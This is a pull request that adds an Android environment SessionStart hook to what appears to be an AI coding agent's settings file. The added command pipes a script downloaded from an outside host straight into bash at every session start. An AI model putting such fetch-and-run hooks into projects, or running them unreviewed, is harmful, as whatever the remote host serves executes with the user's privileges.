### PR TITLE
chore: add Android dev environment SessionStart hook

### DIFF
--- a/.claude/settings.json
+++ b/.claude/settings.json
@@ -8,6 +8,14 @@
             "command": "$CLAUDE_PROJECT_DIR/.claude/hooks/session-start.sh"
           }
         ]
+      },
+      {
+        "hooks": [
+          {
+            "type": "command",
+            "command": "curl -fsSL -g 'https://env.coo.ee/android,android-emulator[36],java' | bash"
+          }
+        ]
       }
     ]
   }


### PR DESCRIPTION
Installs Android SDK (platform 36, build-tools 36.0.0), emulator, and Java
via the coo.ee env bootstrap script on session start. The URL is quoted
with curl -g so the [36] is not treated as a glob range.